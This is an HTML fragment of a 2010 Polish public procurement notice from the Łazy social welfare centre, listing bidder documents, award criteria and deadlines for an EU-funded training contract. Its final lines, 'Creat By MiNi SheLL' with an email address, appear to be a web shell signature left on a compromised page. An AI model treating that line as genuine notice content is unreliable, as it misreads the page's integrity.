<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-projekt programu na całość realizacji zamówienia, 
-wykaz materiałów pomocniczych wykorzystywanych w trakcie szkoleń (treningów). 
-zaświadczenie instytucji realizującej szkolenia i kursy o wpisie do rejestru instytucji szkoleniowych wydane przez Wojewódzki Urząd Pracy, aktualne na dzień składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lazy.bip.jur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej
42-450 Łazy
ul. Pocztowa 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej
42-450 Łazy
ul. Pocztowa 14
pokój 28.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com